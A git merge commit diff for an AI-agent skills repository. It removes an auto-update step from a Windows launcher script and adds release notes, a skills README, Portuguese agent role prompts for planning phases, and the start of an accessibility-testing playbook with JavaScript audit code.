Merge pull request #178 from zinzied/main
Add In-App Sync Skills Button & Simplify Launcher Key changes: - Simplified START_APP.bat: Removed unreliable auto-update logic - Added refresh-skills-plugin.js: Vite plugin for in-app skill sync via /api/refresh-skills - Updated vite.config.js: Registered the refresh skills plugin - Enhanced Home.jsx: Added "Sync Skills" button with loading states and notifications Users can now click a button in the web app to sync skills from GitHub live. Co-authored-by: Zied Boughdir <zinzied> Made-with: Cursor
This commit is contained in:
@@ -14,101 +14,15 @@ IF %ERRORLEVEL% NEQ 0 (
|
||||
exit /b 1
|
||||
)
|
||||
|
||||
:: ===== Auto-Update Skills from GitHub =====
|
||||
echo [INFO] Checking for skill updates...
|
||||
|
||||
:: Method 1: Try Git first (if available)
|
||||
WHERE git >nul 2>nul
|
||||
IF %ERRORLEVEL% EQU 0 goto :USE_GIT
|
||||
|
||||
:: Method 2: Try PowerShell download (fallback)
|
||||
echo [INFO] Git not found. Using alternative download method...
|
||||
goto :USE_POWERSHELL
|
||||
|
||||
:USE_GIT
|
||||
:: Add upstream remote if not already set
|
||||
git remote get-url upstream >nul 2>nul
|
||||
IF %ERRORLEVEL% EQU 0 goto :DO_FETCH
|
||||
echo [INFO] Adding upstream remote...
|
||||
git remote add upstream https://github.com/sickn33/antigravity-awesome-skills.git
|
||||
|
||||
:DO_FETCH
|
||||
echo [INFO] Fetching latest skills from original repo...
|
||||
git fetch upstream >nul 2>nul
|
||||
IF %ERRORLEVEL% NEQ 0 goto :FETCH_FAIL
|
||||
goto :DO_MERGE
|
||||
|
||||
:FETCH_FAIL
|
||||
echo [WARN] Could not fetch updates via Git. Trying alternative method...
|
||||
goto :USE_POWERSHELL
|
||||
|
||||
:DO_MERGE
|
||||
:: Surgically extract ONLY the /skills/ folder from upstream to avoid all merge conflicts
|
||||
git checkout upstream/main -- skills >nul 2>nul
|
||||
IF %ERRORLEVEL% NEQ 0 goto :MERGE_FAIL
|
||||
|
||||
:: Save the updated skills to local history silently
|
||||
git commit -m "auto-update: sync latest skills from upstream" >nul 2>nul
|
||||
echo [INFO] Skills updated successfully from original repo!
|
||||
goto :SKIP_UPDATE
|
||||
|
||||
:MERGE_FAIL
|
||||
echo [WARN] Could not update skills via Git. Trying alternative method...
|
||||
goto :USE_POWERSHELL
|
||||
|
||||
:USE_POWERSHELL
|
||||
echo [INFO] Downloading latest skills via HTTPS...
|
||||
if exist "update_temp" rmdir /S /Q "update_temp" >nul 2>nul
|
||||
if exist "update.zip" del "update.zip" >nul 2>nul
|
||||
|
||||
:: Download the latest repository as ZIP
|
||||
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/sickn33/antigravity-awesome-skills/archive/refs/heads/main.zip' -OutFile 'update.zip' -UseBasicParsing" >nul 2>nul
|
||||
IF %ERRORLEVEL% NEQ 0 goto :DOWNLOAD_FAIL
|
||||
|
||||
:: Extract and update skills
|
||||
echo [INFO] Extracting latest skills...
|
||||
powershell -Command "Expand-Archive -Path 'update.zip' -DestinationPath 'update_temp' -Force" >nul 2>nul
|
||||
IF %ERRORLEVEL% NEQ 0 goto :EXTRACT_FAIL
|
||||
|
||||
:: Copy only the skills folder
|
||||
if exist "update_temp\antigravity-awesome-skills-main\skills" (
|
||||
echo [INFO] Updating skills directory...
|
||||
xcopy /E /Y /I "update_temp\antigravity-awesome-skills-main\skills" "skills" >nul 2>nul
|
||||
echo [INFO] Skills updated successfully without Git!
|
||||
) else (
|
||||
echo [WARN] Could not find skills folder in downloaded archive.
|
||||
goto :UPDATE_FAIL
|
||||
)
|
||||
|
||||
:: Cleanup
|
||||
del "update.zip" >nul 2>nul
|
||||
rmdir /S /Q "update_temp" >nul 2>nul
|
||||
goto :SKIP_UPDATE
|
||||
|
||||
:DOWNLOAD_FAIL
|
||||
echo [WARN] Failed to download skills update (network issue or no internet).
|
||||
goto :UPDATE_FAIL
|
||||
|
||||
:EXTRACT_FAIL
|
||||
echo [WARN] Failed to extract downloaded skills archive.
|
||||
goto :UPDATE_FAIL
|
||||
|
||||
:UPDATE_FAIL
|
||||
echo [INFO] Continuing with local skills version...
|
||||
echo [INFO] To manually update skills later, run: npm run update:skills
|
||||
|
||||
:SKIP_UPDATE
|
||||
|
||||
:: Check/Install dependencies
|
||||
cd web-app
|
||||
|
||||
:CHECK_DEPS
|
||||
if not exist "node_modules\" (
|
||||
echo [INFO] Dependencies not found. Installing...
|
||||
goto :INSTALL_DEPS
|
||||
)
|
||||
|
||||
:: Verify dependencies aren't corrupted (e.g. esbuild arch mismatch after update)
|
||||
:: Verify dependencies aren't corrupted
|
||||
echo [INFO] Verifying app dependencies...
|
||||
call npx -y vite --version >nul 2>nul
|
||||
if %ERRORLEVEL% NEQ 0 (
|
||||
@@ -138,6 +52,7 @@ call npm run app:setup
|
||||
:: Start App
|
||||
echo [INFO] Starting Web App...
|
||||
echo [INFO] Opening default browser...
|
||||
echo [INFO] Use the Sync Skills button in the app to update skills from GitHub!
|
||||
cd web-app
|
||||
call npx -y vite --open
|
||||
|
||||
|
||||
14
release_notes.md
Normal file
14
release_notes.md
Normal file
@@ -0,0 +1,14 @@
|
||||
## v6.2.0 - Interactive Web App & AWS IaC
|
||||
|
||||
**Feature release: Interactive Skills Web App, AWS Infrastructure as Code skills, and Chrome Extension / Cloudflare Workers developer skills.**
|
||||
|
||||
- **New skills** (PR #124): `cdk-patterns`, `cloudformation-best-practices`, `terraform-aws-modules`.
|
||||
- **New skills** (PR #128): `chrome-extension-developer`, `cloudflare-workers-expert`.
|
||||
- **Interactive Skills Web App** (PR #126): Local skills browser with `START_APP.bat`, setup, and `web-app/` project.
|
||||
- **Shopify Development Skill Fix** (PR #125): Markdown syntax cleanup for `skills/shopify-development/SKILL.md`.
|
||||
- **Community Sources** (PR #127): Added SSOJet skills and integration guides to Credits & Sources.
|
||||
- **Registry**: Now tracking 930 skills.
|
||||
|
||||
---
|
||||
|
||||
_Upgrade: `git pull origin main` or `npx antigravity-awesome-skills`_
|
||||
9682
web-app/public/skills.json
Normal file
9682
web-app/public/skills.json
Normal file
File diff suppressed because it is too large
Load Diff
3
web-app/public/skills/.gitignore
vendored
Normal file
3
web-app/public/skills/.gitignore
vendored
Normal file
@@ -0,0 +1,3 @@
|
||||
# Local-only: disabled skills for lean configuration
|
||||
# These skills are kept in the repository but disabled locally
|
||||
.disabled/
|
||||
@@ -5,6 +5,7 @@ description: "Arquitecto de Soluciones Principal y Consultor Tecnológico de And
|
||||
category: andruia
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
## When to Use
|
||||
|
||||
@@ -3,12 +3,16 @@ id: 10-andruia-skill-smith
|
||||
name: 10-andruia-skill-smith
|
||||
description: "Ingeniero de Sistemas de Andru.ia. Diseña, redacta y despliega nuevas habilidades (skills) dentro del repositorio siguiendo el Estándar de Diamante."
|
||||
category: andruia
|
||||
risk: official
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-25"
|
||||
---
|
||||
|
||||
# 🔨 Andru.ia Skill-Smith (The Forge)
|
||||
|
||||
## When to Use
|
||||
Esta habilidad es aplicable para ejecutar el flujo de trabajo o las acciones descritas en la descripción general.
|
||||
|
||||
|
||||
## 📝 Descripción
|
||||
Soy el Ingeniero de Sistemas de Andru.ia. Mi propósito es diseñar, redactar y desplegar nuevas habilidades (skills) dentro del repositorio, asegurando que cumplan con la estructura oficial de Antigravity y el Estándar de Diamante.
|
||||
@@ -38,4 +42,4 @@ Generar el código para los siguientes archivos:
|
||||
|
||||
## ⚠️ Reglas de Oro
|
||||
- **Prefijos Numéricos:** Asignar un número correlativo a la carpeta (ej. 11, 12, 13) para mantener el orden.
|
||||
- **Prompt Engineering:** Las instrucciones deben incluir técnicas de "Few-shot" o "Chain of Thought" para máxima precisión.
|
||||
- **Prompt Engineering:** Las instrucciones deben incluir técnicas de "Few-shot" o "Chain of Thought" para máxima precisión.
|
||||
|
||||
@@ -5,6 +5,7 @@ description: "Estratega de Inteligencia de Dominio de Andru.ia. Analiza el nicho
|
||||
category: andruia
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
## When to Use
|
||||
|
||||
@@ -1,8 +1,9 @@
|
||||
---
|
||||
name: 3d-web-experience
|
||||
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing ..."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# 3D Web Experience
|
||||
|
||||
201
web-app/public/skills/README.md
Normal file
201
web-app/public/skills/README.md
Normal file
@@ -0,0 +1,201 @@
|
||||
# Skills Directory
|
||||
|
||||
**Welcome to the skills folder!** This is where all 179+ specialized AI skills live.
|
||||
|
||||
## 🤔 What Are Skills?
|
||||
|
||||
Skills are specialized instruction sets that teach AI assistants how to handle specific tasks. Think of them as expert knowledge modules that your AI can load on-demand.
|
||||
|
||||
**Simple analogy:** Just like you might consult different experts (a designer, a security expert, a marketer), skills let your AI become an expert in different areas when you need them.
|
||||
|
||||
---
|
||||
|
||||
## 📂 Folder Structure
|
||||
|
||||
Each skill lives in its own folder with this structure:
|
||||
|
||||
```
|
||||
skills/
|
||||
├── skill-name/ # Individual skill folder
|
||||
│ ├── SKILL.md # Main skill definition (required)
|
||||
│ ├── scripts/ # Helper scripts (optional)
|
||||
│ ├── examples/ # Usage examples (optional)
|
||||
│ └── resources/ # Templates & resources (optional)
|
||||
```
|
||||
|
||||
**Key point:** Only `SKILL.md` is required. Everything else is optional!
|
||||
|
||||
---
|
||||
|
||||
## How to Use Skills
|
||||
|
||||
### Step 1: Make sure skills are installed
|
||||
Skills should be in your `.agent/skills/` directory (or `.claude/skills/`, `.gemini/skills/`, etc.)
|
||||
|
||||
### Step 2: Invoke a skill in your AI chat
|
||||
Use the `@` symbol followed by the skill name:
|
||||
|
||||
```
|
||||
@brainstorming help me design a todo app
|
||||
```
|
||||
|
||||
or
|
||||
|
||||
```
|
||||
@stripe-integration add payment processing to my app
|
||||
```
|
||||
|
||||
### Step 3: The AI becomes an expert
|
||||
The AI loads that skill's knowledge and helps you with specialized expertise!
|
||||
|
||||
---
|
||||
|
||||
## Skill Categories
|
||||
|
||||
### Creative & Design
|
||||
Skills for visual design, UI/UX, and artistic creation:
|
||||
- `@algorithmic-art` - Create algorithmic art with p5.js
|
||||
- `@canvas-design` - Design posters and artwork (PNG/PDF output)
|
||||
- `@frontend-design` - Build production-grade frontend interfaces
|
||||
- `@ui-ux-pro-max` - Professional UI/UX design with color, fonts, layouts
|
||||
- `@web-artifacts-builder` - Build modern web apps (React, Tailwind, Shadcn/ui)
|
||||
- `@theme-factory` - Generate themes for documents and presentations
|
||||
- `@brand-guidelines` - Apply Anthropic brand design standards
|
||||
- `@slack-gif-creator` - Create high-quality GIFs for Slack
|
||||
|
||||
### Development & Engineering
|
||||
Skills for coding, testing, debugging, and code review:
|
||||
- `@test-driven-development` - Write tests before implementation (TDD)
|
||||
- `@systematic-debugging` - Debug systematically, not randomly
|
||||
- `@webapp-testing` - Test web apps with Playwright
|
||||
- `@receiving-code-review` - Handle code review feedback properly
|
||||
- `@requesting-code-review` - Request code reviews before merging
|
||||
- `@finishing-a-development-branch` - Complete dev branches (merge, PR, cleanup)
|
||||
- `@subagent-driven-development` - Coordinate multiple AI agents for parallel tasks
|
||||
|
||||
### Documentation & Office
|
||||
Skills for working with documents and office files:
|
||||
- `@doc-coauthoring` - Collaborate on structured documents
|
||||
- `@docx` - Create, edit, and analyze Word documents
|
||||
- `@xlsx` - Work with Excel spreadsheets (formulas, charts)
|
||||
- `@pptx` - Create and modify PowerPoint presentations
|
||||
- `@pdf` - Handle PDFs (extract text, merge, split, fill forms)
|
||||
- `@internal-comms` - Draft internal communications (reports, announcements)
|
||||
- `@notebooklm` - Query Google NotebookLM notebooks
|
||||
|
||||
### Planning & Workflow
|
||||
Skills for task planning and workflow optimization:
|
||||
- `@brainstorming` - Brainstorm and design before coding
|
||||
- `@writing-plans` - Write detailed implementation plans
|
||||
- `@planning-with-files` - File-based planning system (Manus-style)
|
||||
- `@executing-plans` - Execute plans with checkpoints and reviews
|
||||
- `@using-git-worktrees` - Create isolated Git worktrees for parallel work
|
||||
- `@verification-before-completion` - Verify work before claiming completion
|
||||
- `@using-superpowers` - Discover and use advanced skills
|
||||
|
||||
### System Extension
|
||||
Skills for extending AI capabilities:
|
||||
- `@mcp-builder` - Build MCP (Model Context Protocol) servers
|
||||
- `@skill-creator` - Create new skills or update existing ones
|
||||
- `@writing-skills` - Tools for writing and validating skill files
|
||||
- `@dispatching-parallel-agents` - Distribute tasks to multiple agents
|
||||
|
||||
---
|
||||
|
||||
## Finding Skills
|
||||
|
||||
### Method 1: Browse this folder
|
||||
```bash
|
||||
ls skills/
|
||||
```
|
||||
|
||||
### Method 2: Search by keyword
|
||||
```bash
|
||||
ls skills/ | grep "keyword"
|
||||
```
|
||||
|
||||
### Method 3: Check the main README
|
||||
See the [main README](../README.md) for the complete list of all 179+ skills organized by category.
|
||||
|
||||
---
|
||||
|
||||
## 💡 Popular Skills to Try
|
||||
|
||||
**For beginners:**
|
||||
- `@brainstorming` - Design before coding
|
||||
- `@systematic-debugging` - Fix bugs methodically
|
||||
- `@git-pushing` - Commit with good messages
|
||||
|
||||
**For developers:**
|
||||
- `@test-driven-development` - Write tests first
|
||||
- `@react-best-practices` - Modern React patterns
|
||||
- `@senior-fullstack` - Full-stack development
|
||||
|
||||
**For security:**
|
||||
- `@ethical-hacking-methodology` - Security basics
|
||||
- `@burp-suite-testing` - Web app security testing
|
||||
|
||||
---
|
||||
|
||||
## Creating Your Own Skill
|
||||
|
||||
Want to create a new skill? Check out:
|
||||
1. [CONTRIBUTING.md](../CONTRIBUTING.md) - How to contribute
|
||||
2. [docs/SKILL_ANATOMY.md](../docs/SKILL_ANATOMY.md) - Skill structure guide
|
||||
3. `@skill-creator` - Use this skill to create new skills!
|
||||
|
||||
**Basic structure:**
|
||||
```markdown
|
||||
---
|
||||
name: my-skill-name
|
||||
description: "What this skill does"
|
||||
---
|
||||
|
||||
# Skill Title
|
||||
|
||||
## Overview
|
||||
[What this skill does]
|
||||
|
||||
## When to Use
|
||||
- Use when [scenario]
|
||||
|
||||
## Instructions
|
||||
[Step-by-step guide]
|
||||
|
||||
## Examples
|
||||
[Code examples]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Documentation
|
||||
|
||||
- **[Getting Started](../docs/GETTING_STARTED.md)** - Quick start guide
|
||||
- **[Examples](../docs/EXAMPLES.md)** - Real-world usage examples
|
||||
- **[FAQ](../docs/FAQ.md)** - Common questions
|
||||
- **[Visual Guide](../docs/VISUAL_GUIDE.md)** - Diagrams and flowcharts
|
||||
|
||||
---
|
||||
|
||||
## 🌟 Contributing
|
||||
|
||||
Found a skill that needs improvement? Want to add a new skill?
|
||||
|
||||
1. Read [CONTRIBUTING.md](../CONTRIBUTING.md)
|
||||
2. Study existing skills in this folder
|
||||
3. Create your skill following the structure
|
||||
4. Submit a Pull Request
|
||||
|
||||
---
|
||||
|
||||
## References
|
||||
|
||||
- [Anthropic Skills](https://github.com/anthropic/skills) - Official Anthropic skills
|
||||
- [UI/UX Pro Max Skills](https://github.com/nextlevelbuilder/ui-ux-pro-max-skill) - Design skills
|
||||
- [Superpowers](https://github.com/obra/superpowers) - Original superpowers collection
|
||||
- [Planning with Files](https://github.com/OthmanAdi/planning-with-files) - Planning patterns
|
||||
- [NotebookLM](https://github.com/PleasePrompto/notebooklm-skill) - NotebookLM integration
|
||||
|
||||
---
|
||||
|
||||
**Need help?** Check the [FAQ](../docs/FAQ.md) or open an issue on GitHub!
|
||||
22
web-app/public/skills/SPDD/1-research.md
Normal file
22
web-app/public/skills/SPDD/1-research.md
Normal file
@@ -0,0 +1,22 @@
|
||||
# ROLE: Codebase Research Agent
|
||||
Sua única missão é documentar e explicar a base de código como ela existe hoje.
|
||||
|
||||
## CRITICAL RULES:
|
||||
- NÃO sugira melhorias, refatorações ou mudanças arquiteturais.
|
||||
- NÃO realize análise de causa raiz ou proponha melhorias futuras.
|
||||
- APENAS descreva o que existe, onde existe e como os componentes interagem.
|
||||
- Você é um cartógrafo técnico criando um mapa do sistema atual.
|
||||
|
||||
## STEPS TO FOLLOW:
|
||||
1. **Initial Analysis:** Leia os arquivos mencionados pelo usuário integralmente (SEM limit/offset).
|
||||
2. **Decomposition:** Decompunha a dúvida do usuário em áreas de pesquisa (ex: Rotas, Banco, UI).
|
||||
3. **Execution:** - Localize onde os arquivos e componentes vivem.
|
||||
- Analise COMO o código atual funciona (sem criticar).
|
||||
- Encontre exemplos de padrões existentes para referência.
|
||||
4. **Project State:**
|
||||
- Se projeto NOVO: Pesquise e liste a melhor estrutura de pastas e bibliotecas padrão de mercado para a stack.
|
||||
- Se projeto EXISTENTE: Identifique dívidas técnicas ou padrões que devem ser respeitados.
|
||||
|
||||
## OUTPUT:
|
||||
- Gere o arquivo `docs/prds/prd_current_task.md` com YAML frontmatter (date, topic, tags, status).
|
||||
- **Ação Obrigatória:** Termine com: "Pesquisa concluída. Por favor, dê um `/clear` e carregue `.agente/2-spec.md` para o planejamento."
|
||||
20
web-app/public/skills/SPDD/2-spec.md
Normal file
20
web-app/public/skills/SPDD/2-spec.md
Normal file
@@ -0,0 +1,20 @@
|
||||
# ROLE: Implementation Planning Agent
|
||||
Você deve criar planos de implementação detalhados e ser cético quanto a requisitos vagos.
|
||||
|
||||
## CRITICAL RULES:
|
||||
- Não escreva o plano de uma vez; valide a estrutura das fases com o usuário.
|
||||
- Cada decisão técnica deve ser tomada antes de finalizar o plano.
|
||||
- O plano deve ser acionável e completo, sem "perguntas abertas".
|
||||
|
||||
## STEPS TO FOLLOW:
|
||||
1. **Context Check:** Leia o `docs/prds/prd_current_task.md` gerado anteriormente.
|
||||
2. **Phasing:** Divida o trabalho em fases incrementais e testáveis.
|
||||
3. **Detailing:** Para cada arquivo afetado, defina:
|
||||
- **Path exato.**
|
||||
- **Ação:** (CRIAR | MODIFICAR | DELETAR).
|
||||
- **Lógica:** Snippets de pseudocódigo ou referências de implementação.
|
||||
4. **Success Criteria:** Defina "Automated Verification" (scripts/testes) e "Manual Verification" (UI/UX).
|
||||
|
||||
## OUTPUT:
|
||||
- Gere o arquivo `docs/specs/spec_current_task.md` seguindo o template de fases.
|
||||
- **Ação Obrigatória:** Termine com: "Spec finalizada. Por favor, dê um `/clear` e carregue `.agente/3-implementation.md` para execução."
|
||||
20
web-app/public/skills/SPDD/3-implementation.md
Normal file
20
web-app/public/skills/SPDD/3-implementation.md
Normal file
@@ -0,0 +1,20 @@
|
||||
# ROLE: Implementation Execution Agent
|
||||
Você deve implementar um plano técnico aprovado com precisão cirúrgica.
|
||||
|
||||
## CRITICAL RULES:
|
||||
- Siga a intenção do plano enquanto se adapta à realidade encontrada.
|
||||
- Implemente uma fase COMPLETAMENTE antes de passar para a próxima.
|
||||
- **STOP & THINK:** Se encontrar um erro na Spec ou um mismatch no código, PARE e reporte. Não tente adivinhar.
|
||||
|
||||
## STEPS TO FOLLOW:
|
||||
1. **Sanity Check:** Leia a Spec e o Ticket original. Verifique se o ambiente está limpo.
|
||||
2. **Execution:** Codifique seguindo os padrões de Clean Code e os snippets da Spec.
|
||||
3. **Verification:**
|
||||
- Após cada fase, execute os comandos de "Automated Verification" descritos na Spec.
|
||||
- PAUSE para confirmação manual do usuário após cada fase concluída.
|
||||
4. **Progress:** Atualize os checkboxes (- [x]) no arquivo de Spec conforme avança.
|
||||
|
||||
## OUTPUT:
|
||||
- Código fonte implementado.
|
||||
- Relatório de conclusão de fase com resultados de testes.
|
||||
- **Ação Final:** Pergunte se o usuário deseja realizar testes de regressão ou seguir para a próxima task.
|
||||
@@ -3,6 +3,7 @@ name: ab-test-setup
|
||||
description: "Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# A/B Test Setup
|
||||
|
||||
@@ -3,6 +3,7 @@ name: accessibility-compliance-accessibility-audit
|
||||
description: "You are an accessibility expert specializing in WCAG compliance, inclusive design, and assistive technology compatibility. Conduct audits, identify barriers, and provide remediation guidance."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Accessibility Audit and Testing
|
||||
|
||||
@@ -0,0 +1,502 @@
|
||||
# Accessibility Audit and Testing Implementation Playbook
|
||||
|
||||
This file contains detailed patterns, checklists, and code samples referenced by the skill.
|
||||
|
||||
## Instructions
|
||||
|
||||
### 1. Automated Testing with axe-core
|
||||
|
||||
```javascript
|
||||
// accessibility-test.js
|
||||
const { AxePuppeteer } = require("@axe-core/puppeteer");
|
||||
const puppeteer = require("puppeteer");
|
||||
|
||||
class AccessibilityAuditor {
|
||||
constructor(options = {}) {
|
||||
this.wcagLevel = options.wcagLevel || "AA";
|
||||
this.viewport = options.viewport || { width: 1920, height: 1080 };
|
||||
}
|
||||
|
||||
async runFullAudit(url) {
|
||||
const browser = await puppeteer.launch();
|
||||
const page = await browser.newPage();
|
||||
await page.setViewport(this.viewport);
|
||||
await page.goto(url, { waitUntil: "networkidle2" });
|
||||
|
||||
const results = await new AxePuppeteer(page)
|
||||
.withTags(["wcag2a", "wcag2aa", "wcag21a", "wcag21aa"])
|
||||
.exclude(".no-a11y-check")
|
||||
.analyze();
|
||||
|
||||
await browser.close();
|
||||
|
||||
return {
|
||||
url,
|
||||
timestamp: new Date().toISOString(),
|
||||
violations: results.violations.map((v) => ({
|
||||
id: v.id,
|
||||
impact: v.impact,
|
||||
description: v.description,
|
||||
help: v.help,
|
||||
helpUrl: v.helpUrl,
|
||||
nodes: v.nodes.map((n) => ({
|
||||
html: n.html,
|
||||
target: n.target,
|
||||
failureSummary: n.failureSummary,
|
||||
})),
|
||||
})),
|
||||
score: this.calculateScore(results),
|
||||
};
|
||||
}
|
||||
|
||||
calculateScore(results) {
|
||||
const weights = { critical: 10, serious: 5, moderate: 2, minor: 1 };
|
||||
let totalWeight = 0;
|
||||
results.violations.forEach((v) => {
|
||||
totalWeight += weights[v.impact] || 0;
|
||||
});
|
||||
return Math.max(0, 100 - totalWeight);
|
||||
}
|
||||
}
|
||||
|
||||
// Component testing with jest-axe
|
||||
import { render } from "@testing-library/react";
|
||||
import { axe, toHaveNoViolations } from "jest-axe";
|
||||
|
||||
expect.extend(toHaveNoViolations);
|
||||
|
||||
describe("Accessibility Tests", () => {
|
||||
it("should have no violations", async () => {
|
||||
const { container } = render(<MyComponent />);
|
||||
const results = await axe(container);
|
||||
expect(results).toHaveNoViolations();
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### 2. Color Contrast Validation
|
||||
|
||||
```javascript
|
||||
// color-contrast.js
|
||||
class ColorContrastAnalyzer {
|
||||
constructor() {
|
||||
this.wcagLevels = {
|
||||
'AA': { normal: 4.5, large: 3 },
|
||||
'AAA': { normal: 7, large: 4.5 }
|
||||
};
|
||||
}
|
||||
|
||||
async analyzePageContrast(page) {
|
||||
const elements = await page.evaluate(() => {
|
||||
return Array.from(document.querySelectorAll('*'))
|
||||
.filter(el => el.innerText && el.innerText.trim())
|
||||
.map(el => {
|
||||
const styles = window.getComputedStyle(el);
|
||||
return {
|
||||
text: el.innerText.trim().substring(0, 50),
|
||||
color: styles.color,
|
||||
backgroundColor: styles.backgroundColor,
|
||||
fontSize: parseFloat(styles.fontSize),
|
||||
fontWeight: styles.fontWeight
|
||||
};
|
||||
});
|
||||
});
|
||||
|
||||
return elements
|
||||
.map(el => {
|
||||
const contrast = this.calculateContrast(el.color, el.backgroundColor);
|
||||
const isLarge = this.isLargeText(el.fontSize, el.fontWeight);
|
||||
const required = isLarge ? this.wcagLevels.AA.large : this.wcagLevels.AA.normal;
|
||||
|
||||
if (contrast < required) {
|
||||
return {
|
||||
text: el.text,
|
||||
currentContrast: contrast.toFixed(2),
|
||||
requiredContrast: required,
|
||||
foreground: el.color,
|
||||
background: el.backgroundColor
|
||||
};
|
||||
}
|
||||
return null;
|
||||
})
|
||||
.filter(Boolean);
|
||||
}
|
||||
|
||||
calculateContrast(fg, bg) {
|
||||
const l1 = this.relativeLuminance(this.parseColor(fg));
|
||||
const l2 = this.relativeLuminance(this.parseColor(bg));
|
||||
const lighter = Math.max(l1, l2);
|
||||
const darker = Math.min(l1, l2);
|
||||
return (lighter + 0.05) / (darker + 0.05);
|
||||
}
|
||||
|
||||
relativeLuminance(rgb) {
|
||||
const [r, g, b] = rgb.map(val => {
|
||||
val = val / 255;
|
||||
return val <= 0.03928 ? val / 12.92 : Math.pow((val + 0.055) / 1.055, 2.4);
|
||||
});
|
||||
return 0.2126 * r + 0.7152 * g + 0.0722 * b;
|
||||
}
|
||||
}
|
||||
|
||||
// High contrast CSS
|
||||
@media (prefers-contrast: high) {
|
||||
:root {
|
||||
--text-primary: #000;
|
||||
--bg-primary: #fff;
|
||||
--border-color: #000;
|
||||
}
|
||||
a { text-decoration: underline !important; }
|
||||
button, input { border: 2px solid var(--border-color) !important; }
|
||||
}
|
||||
```
|
||||
|
||||
### 3. Keyboard Navigation Testing
|
||||
|
||||
```javascript
|
||||
// keyboard-navigation.js
|
||||
class KeyboardNavigationTester {
|
||||
async testKeyboardNavigation(page) {
|
||||
const results = {
|
||||
focusableElements: [],
|
||||
missingFocusIndicators: [],
|
||||
keyboardTraps: [],
|
||||
};
|
||||
|
||||
// Get all focusable elements
|
||||
const focusable = await page.evaluate(() => {
|
||||
const selector =
|
||||
'a[href], button, input, select, textarea, [tabindex]:not([tabindex="-1"])';
|
||||
return Array.from(document.querySelectorAll(selector)).map((el) => ({
|
||||
tagName: el.tagName.toLowerCase(),
|
||||
text: el.innerText || el.value || el.placeholder || "",
|
||||
tabIndex: el.tabIndex,
|
||||
}));
|
||||
});
|
||||
|
||||
results.focusableElements = focusable;
|
||||
|
||||
// Test tab order and focus indicators
|
||||
for (let i = 0; i < focusable.length; i++) {
|
||||
await page.keyboard.press("Tab");
|
||||
|
||||
const focused = await page.evaluate(() => {
|
||||
const el = document.activeElement;
|
||||
return {
|
||||
tagName: el.tagName.toLowerCase(),
|
||||
hasFocusIndicator: window.getComputedStyle(el).outline !== "none",
|
||||
};
|
||||
});
|
||||
|
||||
if (!focused.hasFocusIndicator) {
|
||||
results.missingFocusIndicators.push(focused);
|
||||
}
|
||||
}
|
||||
|
||||
return results;
|
||||
}
|
||||
}
|
||||
|
||||
// Enhance keyboard accessibility
|
||||
document.addEventListener("keydown", (e) => {
|
||||
if (e.key === "Escape") {
|
||||
const modal = document.querySelector(".modal.open");
|
||||
if (modal) closeModal(modal);
|
||||
}
|
||||
});
|
||||
|
||||
// Make div clickable accessible
|
||||
document.querySelectorAll("[onclick]").forEach((el) => {
|
||||
if (!["a", "button", "input"].includes(el.tagName.toLowerCase())) {
|
||||
el.setAttribute("tabindex", "0");
|
||||
el.setAttribute("role", "button");
|
||||
el.addEventListener("keydown", (e) => {
|
||||
if (e.key === "Enter" || e.key === " ") {
|
||||
el.click();
|
||||
e.preventDefault();
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### 4. Screen Reader Testing
|
||||
|
||||
```javascript
|
||||
// screen-reader-test.js
|
||||
class ScreenReaderTester {
|
||||
async testScreenReaderCompatibility(page) {
|
||||
return {
|
||||
landmarks: await this.testLandmarks(page),
|
||||
headings: await this.testHeadingStructure(page),
|
||||
images: await this.testImageAccessibility(page),
|
||||
forms: await this.testFormAccessibility(page),
|
||||
};
|
||||
}
|
||||
|
||||
async testHeadingStructure(page) {
|
||||
const headings = await page.evaluate(() => {
|
||||
return Array.from(
|
||||
document.querySelectorAll("h1, h2, h3, h4, h5, h6"),
|
||||
).map((h) => ({
|
||||
level: parseInt(h.tagName[1]),
|
||||
text: h.textContent.trim(),
|
||||
isEmpty: !h.textContent.trim(),
|
||||
}));
|
||||
});
|
||||
|
||||
const issues = [];
|
||||
let previousLevel = 0;
|
||||
|
||||
headings.forEach((heading, index) => {
|
||||
if (heading.level > previousLevel + 1 && previousLevel !== 0) {
|
||||
issues.push({
|
||||
type: "skipped-level",
|
||||
message: `Heading level ${heading.level} skips from level ${previousLevel}`,
|
||||
});
|
||||
}
|
||||
if (heading.isEmpty) {
|
||||
issues.push({ type: "empty-heading", index });
|
||||
}
|
||||
previousLevel = heading.level;
|
||||
});
|
||||
|
||||
if (!headings.some((h) => h.level === 1)) {
|
||||
issues.push({ type: "missing-h1", message: "Page missing h1 element" });
|
||||
}
|
||||
|
||||
return { headings, issues };
|
||||
}
|
||||
|
||||
async testFormAccessibility(page) {
|
||||
const forms = await page.evaluate(() => {
|
||||
return Array.from(document.querySelectorAll("form")).map((form) => {
|
||||
const inputs = form.querySelectorAll("input, textarea, select");
|
||||
return {
|
||||
fields: Array.from(inputs).map((input) => ({
|
||||
type: input.type || input.tagName.toLowerCase(),
|
||||
id: input.id,
|
||||
hasLabel: input.id
|
||||
? !!document.querySelector(`label[for="${input.id}"]`)
|
||||
: !!input.closest("label"),
|
||||
hasAriaLabel: !!input.getAttribute("aria-label"),
|
||||
required: input.required,
|
||||
})),
|
||||
};
|
||||
});
|
||||
});
|
||||
|
||||
const issues = [];
|
||||
forms.forEach((form, i) => {
|
||||
form.fields.forEach((field, j) => {
|
||||
if (!field.hasLabel && !field.hasAriaLabel) {
|
||||
issues.push({ type: "missing-label", form: i, field: j });
|
||||
}
|
||||
